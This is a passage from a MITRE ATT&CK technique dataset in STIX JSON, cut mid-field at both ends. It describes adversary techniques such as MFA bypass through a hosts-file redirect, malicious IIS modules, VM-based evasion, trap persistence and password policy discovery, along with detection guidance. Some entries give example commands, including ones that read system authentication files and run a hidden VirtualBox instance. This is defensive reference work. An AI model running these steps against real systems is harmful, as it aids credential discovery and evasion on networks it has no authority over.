Windows hosts file (`C:\\windows\\system32\\drivers\\etc\\hosts`) to redirect MFA calls to localhost instead of an MFA server may cause the MFA process to fail. If a \"fail open\" policy is in place, any otherwise successful authentication attempt may be granted access without enforcing MFA. (Citation: Russians Exploit Default MFA Protocol - CISA March 2022) \n\nDepending on the scope, goals, and privileges of the adversary, MFA defenses may be disabled for individual accounts or for all accounts tied to a larger group, such as all domain accounts in a victim's network environment.(Citation: Russians Exploit Default MFA Protocol - CISA March 2022) ", + "kill_chain_phases": [ + { + "kill_chain_name": "mitre-attack", + "phase_name": "credential-access" + }, + { + "kill_chain_name": "mitre-attack", + "phase_name": "defense-evasion" + }, + { + "kill_chain_name": "mitre-attack", + "phase_name": "persistence" + } + ], + "x_mitre_attack_spec_version": "3.2.0", + "x_mitre_contributors": [ + "Liran Ravich, CardinalOps", + "Muhammad Moiz Arshad, @5T34L7H" + ], + "x_mitre_deprecated": false, + "x_mitre_detection": "", + "x_mitre_domains": [ + "enterprise-attack" + ], + "x_mitre_is_subtechnique": true, + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_platforms": [ + "Windows", + "Azure AD", + "Office 365", + "SaaS", + "IaaS", + "Google Workspace", + "Linux", + "macOS" + ], + "x_mitre_version": "1.2", + "x_mitre_data_sources": [], + "x_mitre_defense_bypassed": [ + "Multi-Factor Authentication" + ], + "type": "attack-pattern", + "spec_version": "2.1", + "id": "attack-pattern--b4409cd8-0da9-46e1-a401-a241afd4d1cc", + "created": "2022-05-31T19:31:38.431Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/techniques/T1556/006", + "external_id": "T1556.006" + }, + { + "source_name": "Russians Exploit Default MFA Protocol - CISA March 2022", + "description": "Cyber Security Infrastructure Agency. (2022, March 15). Russian State-Sponsored Cyber Actors Gain Network Access by Exploiting Default Multifactor Authentication Protocols and “PrintNightmare” Vulnerability. Retrieved May 31, 2022.", + "url": "https://www.cisa.gov/uscert/ncas/alerts/aa22-074a" + }, + { + "source_name": "Mandiant APT42", + "description": "Mandiant. (n.d.). APT42: Crooked Charms, Cons and Compromise. Retrieved September 16, 2022.", + "url": "https://www.mandiant.com/media/17826" + }, + { + "source_name": "Azure AD Conditional Access Exclusions", + "description": "Microsoft. (2022, August 26). Use Azure AD access reviews to manage users excluded from Conditional Access policies. Retrieved August 30, 2022.", + "url": "https://docs.microsoft.com/en-us/azure/active-directory/governance/conditional-access-exclusion" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ] + }, + { + "modified": "2023-05-31T12:34:03.420Z", + "name": "Remote Email Collection", + "description": "Adversaries may target an Exchange server, Office 365, or Google Workspace to collect sensitive information. Adversaries may leverage a user's credentials and interact directly with the Exchange server to acquire information from within a network. Adversaries may also access externally facing Exchange services, Office 365, or Google Workspace to access email using credentials or access tokens. Tools such as [MailSniper](https://attack.mitre.org/software/S0413) can be used to automate searches for specific keywords.", + "kill_chain_phases": [ + { + "kill_chain_name": "mitre-attack", + "phase_name": "collection" + } + ], + "x_mitre_attack_spec_version": "3.1.0", + "x_mitre_contributors": [], + "x_mitre_deprecated": false, + "x_mitre_detection": "Monitor for unusual login activity from unknown or abnormal locations, especially for privileged accounts (ex: Exchange administrator account).", + "x_mitre_domains": [ + "enterprise-attack" + ], + "x_mitre_is_subtechnique": true, + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_platforms": [ + "Office 365", + "Windows", + "Google Workspace" + ], + "x_mitre_version": "1.2", + "x_mitre_data_sources": [], + "type": "attack-pattern", + "spec_version": "2.1", + "id": "attack-pattern--b4694861-542c-48ea-9eb1-10d356e7140a", + "created": "2020-02-19T18:52:24.547Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/techniques/T1114/002", + "external_id": "T1114.002" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ] + }, + { + "modified": "2022-04-25T14:00:00.188Z", + "name": "IIS Components", + "description": "Adversaries may install malicious components that run on Internet Information Services (IIS) web servers to establish persistence. IIS provides several mechanisms to extend the functionality of the web servers. For example, Internet Server Application Programming Interface (ISAPI) extensions and filters can be installed to examine and/or modify incoming and outgoing IIS web requests. Extensions and filters are deployed as DLL files that export three functions: Get{Extension/Filter}Version, Http{Extension/Filter}Proc, and (optionally) Terminate{Extension/Filter}. IIS modules may also be installed to extend IIS web servers.(Citation: Microsoft ISAPI Extension Overview 2017)(Citation: Microsoft ISAPI Filter Overview 2017)(Citation: IIS Backdoor 2011)(Citation: Trustwave IIS Module 2013)\n\nAdversaries may install malicious ISAPI extensions and filters to observe and/or modify traffic, execute commands on compromised machines, or proxy command and control traffic. ISAPI extensions and filters may have access to all IIS web requests and responses. For example, an adversary may abuse these mechanisms to modify HTTP responses in order to distribute malicious commands/content to previously comprised hosts.(Citation: Microsoft ISAPI Filter Overview 2017)(Citation: Microsoft ISAPI Extension Overview 2017)(Citation: Microsoft ISAPI Extension All Incoming 2017)(Citation: Dell TG-3390)(Citation: Trustwave IIS Module 2013)(Citation: MMPC ISAPI Filter 2012)\n\nAdversaries may also install malicious IIS modules to observe and/or modify traffic. IIS 7.0 introduced modules that provide the same unrestricted access to HTTP requests and responses as ISAPI extensions and filters. IIS modules can be written as a DLL that exports RegisterModule, or as a .NET application that interfaces with ASP.NET APIs to access IIS HTTP requests.(Citation: Microsoft IIS Modules Overview 2007)(Citation: Trustwave IIS Module 2013)(Citation: ESET IIS Malware 2021)", + "kill_chain_phases": [ + { + "kill_chain_name": "mitre-attack", + "phase_name": "persistence" + } + ], + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_contributors": [ + "Wes Hurd" + ], + "x_mitre_detection": "Monitor for creation and/or modification of files (especially DLLs on webservers) that could be abused as malicious ISAPI extensions/filters or IIS modules. Changes to %windir%\\system32\\inetsrv\\config\\applicationhost.config could indicate an IIS module installation.(Citation: Microsoft IIS Modules Overview 2007)(Citation: ESET IIS Malware 2021)\n\nMonitor execution and command-line arguments of AppCmd.exe, which may be abused to install malicious IIS modules.(Citation: Microsoft IIS Modules Overview 2007)(Citation: Unit 42 RGDoor Jan 2018)(Citation: ESET IIS Malware 2021)", + "x_mitre_domains": [ + "enterprise-attack" + ], + "x_mitre_is_subtechnique": true, + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_platforms": [ + "Windows" + ], + "x_mitre_version": "1.0", + "x_mitre_data_sources": [], + "x_mitre_permissions_required": [ + "Administrator", + "SYSTEM" + ], + "type": "attack-pattern", + "spec_version": "2.1", + "id": "attack-pattern--b46a801b-fd98-491c-a25a-bca25d6e3001", + "created": "2021-06-03T18:44:29.770Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/techniques/T1505/004", + "external_id": "T1505.004" + }, + { + "source_name": "Microsoft ISAPI Extension Overview 2017", + "description": "Microsoft. (2017, June 16). ISAPI Extension Overview. Retrieved June 3, 2021.", + "url": "https://docs.microsoft.com/en-us/previous-versions/iis/6.0-sdk/ms525172(v=vs.90)" + }, + { + "source_name": "Microsoft ISAPI Filter Overview 2017", + "description": "Microsoft. (2017, June 16). ISAPI Filter Overview. Retrieved June 3, 2021.", + "url": "https://docs.microsoft.com/en-us/previous-versions/iis/6.0-sdk/ms524610(v=vs.90)" + }, + { + "source_name": "IIS Backdoor 2011", + "description": "Julien. (2011, February 2). IIS Backdoor. Retrieved June 3, 2021.", + "url": "https://web.archive.org/web/20170106175935/http:/esec-lab.sogeti.com/posts/2011/02/02/iis-backdoor.html" + }, + { + "source_name": "Trustwave IIS Module 2013", + "description": "Grunzweig, J. (2013, December 9). The Curious Case of the Malicious IIS Module. Retrieved June 3, 2021.", + "url": "https://www.trustwave.com/en-us/resources/blogs/spiderlabs-blog/the-curious-case-of-the-malicious-iis-module/" + }, + { + "source_name": "Microsoft ISAPI Extension All Incoming 2017", + "description": "Microsoft. (2017, June 16). Intercepting All Incoming IIS Requests. Retrieved June 3, 2021.", + "url": "https://docs.microsoft.com/en-us/previous-versions/iis/6.0-sdk/ms525696(v=vs.90)" + }, + { + "source_name": "Dell TG-3390", + "description": "Dell SecureWorks Counter Threat Unit Threat Intelligence. (2015, August 5). Threat Group-3390 Targets Organizations for Cyberespionage. Retrieved August 18, 2018.", + "url": "https://www.secureworks.com/research/threat-group-3390-targets-organizations-for-cyberespionage" + }, + { + "source_name": "MMPC ISAPI Filter 2012", + "description": "MMPC. (2012, October 3). Malware signed with the Adobe code signing certificate. Retrieved June 3, 2021.", + "url": "https://web.archive.org/web/20140804175025/http:/blogs.technet.com/b/mmpc/archive/2012/10/03/malware-signed-with-the-adobe-code-signing-certificate.aspx" + }, + { + "source_name": "Microsoft IIS Modules Overview 2007", + "description": "Microsoft. (2007, November 24). IIS Modules Overview. Retrieved June 17, 2021.", + "url": "https://docs.microsoft.com/en-us/iis/get-started/introduction-to-iis/iis-modules-overview" + }, + { + "source_name": "ESET IIS Malware 2021", + "description": "Hromcová, Z., Cherepanov, A. (2021). Anatomy of Native IIS Malware. Retrieved September 9, 2021.", + "url": "https://i.blackhat.com/USA21/Wednesday-Handouts/us-21-Anatomy-Of-Native-Iis-Malware-wp.pdf" + }, + { + "source_name": "Unit 42 RGDoor Jan 2018", + "description": "Falcone, R. (2018, January 25). OilRig uses RGDoor IIS Backdoor on Targets in the Middle East. Retrieved July 6, 2018.", + "url": "https://researchcenter.paloaltonetworks.com/2018/01/unit42-oilrig-uses-rgdoor-iis-backdoor-targets-middle-east/" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ] + }, + { + "modified": "2021-04-29T14:49:39.188Z", + "name": "Invalid Code Signature", + "description": "Adversaries may attempt to mimic features of valid code signatures to increase the chance of deceiving a user, analyst, or tool. Code signing provides a level of authenticity on a binary from the developer and a guarantee that the binary has not been tampered with. Adversaries can copy the metadata and signature information from a signed program, then use it as a template for an unsigned program. Files with invalid code signatures will fail digital signature validation checks, but they may appear more legitimate to users and security tools may improperly handle these files.(Citation: Threatexpress MetaTwin 2017)\n\nUnlike [Code Signing](https://attack.mitre.org/techniques/T1553/002), this activity will not result in a valid signature.", + "kill_chain_phases": [ + { + "kill_chain_name": "mitre-attack", + "phase_name": "defense-evasion" + } + ], + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_contributors": [], + "x_mitre_detection": "Collect and analyze signing certificate metadata and check signature validity on software that executes within the environment, look for invalid signatures as well as unusual certificate characteristics and outliers.", + "x_mitre_domains": [ + "enterprise-attack" + ], + "x_mitre_is_subtechnique": true, + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_platforms": [ + "macOS", + "Windows" + ], + "x_mitre_version": "1.0", + "x_mitre_data_sources": [], + "type": "attack-pattern", + "spec_version": "2.1", + "id": "attack-pattern--b4b7458f-81f2-4d38-84be-1c5ba0167a52", + "created": "2020-02-10T19:49:46.752Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/techniques/T1036/001", + "external_id": "T1036.001" + }, + { + "source_name": "Threatexpress MetaTwin 2017", + "description": "Vest, J. (2017, October 9). Borrowing Microsoft MetaData and Signatures to Hide Binary Payloads. Retrieved September 10, 2019.", + "url": "https://threatexpress.com/blogs/2017/metatwin-borrowing-microsoft-metadata-and-digital-signatures-to-hide-binaries/" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ] + }, + { + "modified": "2023-10-13T17:57:09.388Z", + "name": "Native API", + "description": "Adversaries may directly interact with the native OS application programming interface (API) to access system functions. Native APIs provide a controlled means of calling low-level OS services within the kernel, such as those involving hardware/devices, memory, and processes. (Citation: The MITRE Corporation May 2017) These native APIs are leveraged by the OS during system boot (when other system components are not yet initialized) as well as carrying out tasks and requests during routine operations. \n\nFunctionality provided by native APIs are often also exposed to user-mode applications via interfaces and libraries. For example, functions such as memcpy and direct operations on memory registers can be used to modify user and system memory space.", + "kill_chain_phases": [ + { + "kill_chain_name": "mitre-ics-attack", + "phase_name": "execution" + } + ], + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_contributors": [], + "x_mitre_deprecated": false, + "x_mitre_detection": "", + "x_mitre_domains": [ + "ics-attack" + ], + "x_mitre_is_subtechnique": false, + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_platforms": [ + "None" + ], + "x_mitre_version": "1.0", + "x_mitre_data_sources": [ + "Process: OS API Execution" + ], + "type": "attack-pattern", + "spec_version": "2.1", + "id": "attack-pattern--b52870cc-83f3-473c-b895-72d91751030b", + "created": "2021-04-13T12:36:26.506Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/techniques/T0834", + "external_id": "T0834" + }, + { + "source_name": "The MITRE Corporation May 2017", + "description": "The MITRE Corporation 2017, May 31 ATT&CK T1106: Native API Retrieved. 2021/04/26 ", + "url": "https://attack.mitre.org/techniques/T1106/" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ] + }, + { + "modified": "2022-04-25T14:00:00.188Z", + "name": "Run Virtual Instance", + "description": "Adversaries may carry out malicious operations using a virtual instance to avoid detection. A wide variety of virtualization technologies exist that allow for the emulation of a computer or computing environment. By running malicious code inside of a virtual instance, adversaries can hide artifacts associated with their behavior from security tools that are unable to monitor activity inside the virtual instance. Additionally, depending on the virtual networking implementation (ex: bridged adapter), network traffic generated by the virtual instance can be difficult to trace back to the compromised host as the IP address and hostname might not match known values.(Citation: SingHealth Breach Jan 2019)\n\nAdversaries may utilize native support for virtualization (ex: Hyper-V) or drop the necessary files to run a virtual instance (ex: VirtualBox binaries). After running a virtual instance, adversaries may create a shared folder between the guest and host with permissions that enable the virtual instance to interact with the host file system.(Citation: Sophos Ragnar May 2020)", + "kill_chain_phases": [ + { + "kill_chain_name": "mitre-attack", + "phase_name": "defense-evasion" + } + ], + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_contributors": [ + "Johann Rehberger", + "Janantha Marasinghe", + "Menachem Shafran, XM Cyber" + ], + "x_mitre_detection": "Consider monitoring for files and processes associated with running a virtual instance, such as binary files associated with common virtualization technologies (ex: VirtualBox, VMware, QEMU, Hyper-V). Consider monitoring the size of virtual machines running on the system. Adversaries may create virtual images which are smaller than those of typical virtual machines.(Citation: Shadowbunny VM Defense Evasion) Network adapter information may also be helpful in detecting the use of virtual instances.\n\nConsider monitoring for process command-line arguments that may be atypical for benign use of virtualization software. Usage of virtualization binaries or command-line arguments associated with running a silent installation may be especially suspect (ex. -silent, -ignore-reboot), as well as those associated with running a headless (in the background with no UI) virtual instance (ex. VBoxManage startvm $VM --type headless).(Citation: Shadowbunny VM Defense Evasion) Similarly, monitoring command line arguments which suppress notifications may highlight potentially malicious activity (ex. VBoxManage.exe setextradata global GUI/SuppressMessages \"all\").\n\nMonitor for commands which enable hypervisors such as Hyper-V. If virtualization software is installed by the adversary, the Registry may provide detection opportunities. Consider monitoring for [Windows Service](https://attack.mitre.org/techniques/T1543/003), with respect to virtualization software. \n\nBenign usage of virtualization technology is common in enterprise environments, data and events should not be viewed in isolation, but as part of a chain of behavior.", + "x_mitre_domains": [ + "enterprise-attack" + ], + "x_mitre_is_subtechnique": true, + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_platforms": [ + "Linux", + "macOS", + "Windows" + ], + "x_mitre_version": "1.1", + "x_mitre_data_sources": [], + "x_mitre_permissions_required": [ + "User" + ], + "type": "attack-pattern", + "spec_version": "2.1", + "id": "attack-pattern--b5327dd1-6bf9-4785-a199-25bcbd1f4a9d", + "created": "2020-06-29T15:36:41.535Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/techniques/T1564/006", + "external_id": "T1564.006" + }, + { + "source_name": "SingHealth Breach Jan 2019", + "description": "Committee of Inquiry into the Cyber Attack on SingHealth. (2019, January 10). Public Report of the Committee of Inquiry into the Cyber Attack on Singapore Health Services Private Limited's Patient Database. Retrieved June 29, 2020.", + "url": "https://www.mci.gov.sg/-/media/mcicorp/doc/report-of-the-coi-into-the-cyber-attack-on-singhealth-10-jan-2019.ashx" + }, + { + "source_name": "Sophos Ragnar May 2020", + "description": "SophosLabs. (2020, May 21). Ragnar Locker ransomware deploys virtual machine to dodge security. Retrieved June 29, 2020.", + "url": "https://news.sophos.com/en-us/2020/05/21/ragnar-locker-ransomware-deploys-virtual-machine-to-dodge-security/" + }, + { + "source_name": "Shadowbunny VM Defense Evasion", + "description": "Johann Rehberger. (2020, September 23). Beware of the Shadowbunny - Using virtual machines to persist and evade detections. Retrieved September 22, 2021.", + "url": "https://embracethered.com/blog/posts/2020/shadowbunny-virtual-machine-red-teaming-technique/" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ] + }, + { + "modified": "2022-04-25T14:00:00.188Z", + "name": "Trap", + "description": "The trap command allows programs and shells to specify commands that will be executed upon receiving interrupt signals. A common situation is a script allowing for graceful termination and handling of common keyboard interrupts like ctrl+c and ctrl+d. Adversaries can use this to register code to be executed when the shell encounters specific interrupts either to gain execution or as a persistence mechanism. Trap commands are of the following format trap 'command list' signals where \"command list\" will be executed when \"signals\" are received.(Citation: Trap Manual)(Citation: Cyberciti Trap Statements)", + "kill_chain_phases": [ + { + "kill_chain_name": "mitre-attack", + "phase_name": "execution" + }, + { + "kill_chain_name": "mitre-attack", + "phase_name": "persistence" + } + ], + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_contributors": [], + "x_mitre_detection": "Trap commands must be registered for the shell or programs, so they appear in files. Monitoring files for suspicious or overly broad trap commands can narrow down suspicious behavior during an investigation. Monitor for suspicious processes executed through trap interrupts.", + "x_mitre_domains": [ + "enterprise-attack" + ], + "x_mitre_is_subtechnique": false, + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_platforms": [ + "Linux", + "macOS" + ], + "x_mitre_version": "1.1", + "x_mitre_data_sources": [], + "x_mitre_permissions_required": [ + "User", + "Administrator" + ], + "type": "attack-pattern", + "spec_version": "2.1", + "id": "attack-pattern--b53dbcc6-147d-48bb-9df4-bcb8bb808ff6", + "created": "2017-12-14T16:46:06.044Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": true, + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/techniques/T1154", + "external_id": "T1154" + }, + { + "source_name": "Trap Manual", + "description": "ss64. (n.d.). trap. Retrieved May 21, 2019.", + "url": "https://ss64.com/bash/trap.html" + }, + { + "source_name": "Cyberciti Trap Statements", + "description": "Cyberciti. (2016, March 29). Trap statement. Retrieved May 21, 2019.", + "url": "https://bash.cyberciti.biz/guide/Trap_statement" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ] + }, + { + "modified": "2023-10-13T17:57:09.581Z", + "name": "Loss of Availability", + "description": "Adversaries may attempt to disrupt essential components or systems to prevent owner and operator from delivering products or services. (Citation: Corero) (Citation: Michael J. Assante and Robert M. Lee) (Citation: Tyson Macaulay) \n\nAdversaries may leverage malware to delete or encrypt critical data on HMIs, workstations, or databases.\n\nIn the 2021 Colonial Pipeline ransomware incident, pipeline operations were temporally halted on May 7th and were not fully restarted until May 12th. (Citation: Colonial Pipeline Company May 2021)", + "kill_chain_phases": [ + { + "kill_chain_name": "mitre-ics-attack", + "phase_name": "impact" + } + ], + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_contributors": [], + "x_mitre_deprecated": false, + "x_mitre_detection": "", + "x_mitre_domains": [ + "ics-attack" + ], + "x_mitre_is_subtechnique": false, + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_platforms": [ + "None" + ], + "x_mitre_version": "1.0", + "type": "attack-pattern", + "spec_version": "2.1", + "id": "attack-pattern--b5b9bacb-97f2-4249-b804-47fd44de1f95", + "created": "2020-05-21T17:43:26.506Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/techniques/T0826", + "external_id": "T0826" + }, + { + "source_name": "Colonial Pipeline Company May 2021", + "description": "Colonial Pipeline Company 2021, May Media Statement Update: Colonial Pipeline System Disruption Retrieved. 2021/10/08 ", + "url": "https://www.colpipe.com/news/press-releases/media-statement-colonial-pipeline-system-disruption" + }, + { + "source_name": "Corero", + "description": "Corero Industrial Control System (ICS) Security Retrieved. 2019/11/04 ", + "url": "https://www.corero.com/resources/files/whitepapers/cns_whitepaper_ics.pdf" + }, + { + "source_name": "Michael J. Assante and Robert M. Lee", + "description": "Michael J. Assante and Robert M. Lee Corero Industrial Control System (ICS) Security Retrieved. 2019/11/04 The Industrial Control System Cyber Kill Chain Retrieved. 2019/11/04 ", + "url": "https://www.sans.org/reading-room/whitepapers/ICS/industrial-control-system-cyber-kill-chain-36297" + }, + { + "source_name": "Tyson Macaulay", + "description": "Tyson Macaulay Michael J. Assante and Robert M. Lee Corero Industrial Control System (ICS) Security Retrieved. 2019/11/04 The Industrial Control System Cyber Kill Chain Retrieved. 2019/11/04 RIoT Control: Understanding and Managing Risks and the Internet of Things Retrieved. 2019/11/04 ", + "url": "https://books.google.com/books?id=oXIYBAAAQBAJ&pg=PA249&lpg=PA249&dq=loss+denial+manipulation+of+view&source=bl&ots=dV1uQ8IUff&sig=ACfU3U2NIwGjhg051D_Ytw6npyEk9xcf4w&hl=en&sa=X&ved=2ahUKEwj2wJ7y4tDlAhVmplkKHSTaDnQQ6AEwAHoECAgQAQ#v=onepage&q=loss%20denial%20manipulation%20of%20view&f=false" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ] + }, + { + "modified": "2022-11-08T14:00:00.188Z", + "name": "Password Policy Discovery", + "description": "Adversaries may attempt to access detailed information about the password policy used within an enterprise network or cloud environment. Password policies are a way to enforce complex passwords that are difficult to guess or crack through [Brute Force](https://attack.mitre.org/techniques/T1110). This information may help the adversary to create a list of common passwords and launch dictionary and/or brute force attacks which adheres to the policy (e.g. if the minimum password length should be 8, then not trying passwords such as 'pass123'; not checking for more than 3-4 passwords per account if the lockout is set to 6 as to not lock out accounts).\n\nPassword policies can be set and discovered on Windows, Linux, and macOS systems via various command shell utilities such as net accounts (/domain), Get-ADDefaultDomainPasswordPolicy, chage -l , cat /etc/pam.d/common-password, and pwpolicy getaccountpolicies (Citation: Superuser Linux Password Policies) (Citation: Jamf User Password Policies). Adversaries may also leverage a [Network Device CLI](https://attack.mitre.org/techniques/T1059/008) on network devices to discover password policy information (e.g. show aaa, show aaa common-criteria policy all).(Citation: US-CERT-TA18-106A)\n\nPassword policies can be discovered in cloud environments using available APIs such as GetAccountPasswordPolicy in AWS (Citation: AWS GetPasswordPolicy).", + "kill_chain_phases": [ + { + "kill_chain_name": "mitre-attack", + "phase_name": "discovery" + } + ], + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_contributors": [ + "Regina Elwell", + "Sudhanshu Chauhan, @Sudhanshu_C", + "Isif Ibrahima, Mandiant", + "Austin Clark, @c2defense" + ], + "x_mitre_deprecated": false, + "x_mitre_detection": "Monitor logs and processes for tools and command line arguments that may indicate they're being used for password policy discovery. Correlate that activity with other suspicious activity from the originating system to reduce potential false positives from valid user or administrator activity. Adversaries will likely attempt to find the password policy early in an operation and the activity is likely to happen with other Discovery activity.", + "x_mitre_domains": [ + "enterprise-attack" + ], + "x_mitre_is_subtechnique": false, + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_platforms": [ + "Windows", + "Linux", + "macOS", + "IaaS", + "Network" + ], + "x_mitre_version": "1.5", + "x_mitre_data_sources": [], + "type": "attack-pattern", + "spec_version": "2.1", + "id": "attack-pattern--b6075259-dba3-44e9-87c7-e954f37ec0d5", + "created": "2018-04-18T17:59:24.739Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/techniques/T1201", + "external_id": "T1201" + }, + { + "source_name": "AWS GetPasswordPolicy", + "description": "Amazon Web Services. (n.d.). AWS API GetAccountPasswordPolicy. Retrieved June 8, 2021.", + "url": "https://docs.aws.amazon.com/IAM/latest/APIReference/API_GetAccountPasswordPolicy.html" + }, + { + "source_name": "Jamf User Password Policies", + "description": "Holland, J. (2016, January 25). User password policies on non AD machines. Retrieved April 5, 2018.", + "url": "https://www.jamf.com/jamf-nation/discussions/18574/user-password-policies-on-non-ad-machines" + }, + { + "source_name": "Superuser Linux Password Policies", + "description": "Matutiae, M. (2014, August 6). How to display password policy information for a user (Ubuntu)?. Retrieved April 5, 2018.", + "url": "https://superuser.com/questions/150675/how-to-display-password-policy-information-for-a-user-ubuntu" + }, + { + "source_name": "US-CERT-TA18-106A", + "description": "US-CERT. (2018, April 20). Alert (TA18-106A) Russian State-Sponsored Cyber Actors Targeting Network Infrastructure Devices. Retrieved October 19, 2020.", + "url": "https://www.us-cert.gov/ncas/alerts/TA18-106A" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ] + }, + { + "modified": "2024-03-01T15:49:15.588Z", + "name": "Event Triggered Execution", + "description": "Adversaries may establish persistence and/or elevate privileges using system mechanisms that trigger execution based on specific events. Various operating systems have means to monitor and subscribe to events such as logons or other user activity such as running specific applications/binaries. Cloud environments may also support various functions and services that monitor and can be invoked in response to specific cloud events.(Citation: Backdooring an AWS account)(Citation: Varonis Power Automate Data Exfiltration)(Citation: Microsoft DART Case Report 001)\n\nAdversaries may abuse these mechanisms as a means of maintaining persistent access to a victim via repeatedly executing malicious code. After gaining access to a victim system, adversaries may create/modify event triggers to point to malicious content that will be executed whenever the event trigger is invoked.(Citation: FireEye WMI 2015)(Citation: Malware Persistence on OS X)(Citation: amnesia malware)\n\nSince the execution can be proxied by an account with higher permissions, such as SYSTEM or service accounts, an adversary may be able to abuse these triggered execution mechanisms to escalate their privileges. ", + "kill_chain_phases": [ + { + "kill_chain_name": "mitre-attack", + "phase_name": "privilege-escalation" + }, + { + "kill_chain_name": "mitre-attack", + "phase_name": "persistence" + } + ], + "x_mitre_attack_spec_version": "3.2.0", + "x_mitre_contributors": [], + "x_mitre_deprecated": false, + "x_mitre_detection": "Monitoring for additions or modifications of mechanisms that could be used to trigger event-based execution, especially the addition of abnormal commands such as execution of unknown programs, opening network sockets, or reaching out across the network. Also look for changes that do not line up with updates, patches, or other planned administrative activity. \n\nThese mechanisms may vary by OS, but are typically stored in central repositories that store configuration information such as the Windows Registry, Common Information Model (CIM), and/or specific named files, the last of which can be hashed and compared to known good values. \n\nMonitor for processes, API/System calls, and other common ways of manipulating these event repositories. \n\nTools such as Sysinternals Autoruns can be used to detect changes to execution triggers that could be attempts at persistence. Also look for abnormal process call trees for execution of other commands that could relate to Discovery actions or other techniques. \n\nMonitor DLL loads by processes, specifically looking for DLLs that are not recognized or not normally loaded into a process. Look for abnormal process behavior that may be due to a process loading a malicious DLL. Data and events should not be viewed in isolation, but as part of a chain of behavior that could lead to other activities, such as making network connections for Command and Control, learning details about the environment through Discovery, and conducting Lateral Movement. ", + "x_mitre_domains": [ + "enterprise-attack" + ], + "x_mitre_is_subtechnique": false, + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_platforms": [ + "Linux", + "macOS", + "Windows", + "SaaS", + "IaaS", + "Office 365" + ], + "x_mitre_version": "1.3", + "x_mitre_data_sources": [], + "type": "attack-pattern", + "spec_version": "2.1", + "id": "attack-pattern--b6301b64-ef57-4cce-bb0b-77026f14a8db", + "created": "2020-01-22T21:04:23.285Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/techniques/T1546", + "external_id": "T1546" + }, + { + "source_name": "FireEye WMI 2015", + "description": "Ballenthin, W., et al. (2015). Windows Management Instrumentation (WMI) Offense, Defense, and Forensics. Retrieved March 30, 2016.", + "url": "https://www.fireeye.com/content/dam/fireeye-www/global/en/current-threats/pdfs/wp-windows-management-instrumentation.pdf" + }, + { + "source_name": "Microsoft DART Case Report 001", + "description": "Berk Veral. (2020, March 9). Real-life cybercrime stories from DART, the Microsoft Detection and Response Team. Retrieved May 27, 2022.", + "url": "https://www.microsoft.com/security/blog/2020/03/09/real-life-cybercrime-stories-dart-microsoft-detection-and-response-team" + }, + { + "source_name": "amnesia malware", + 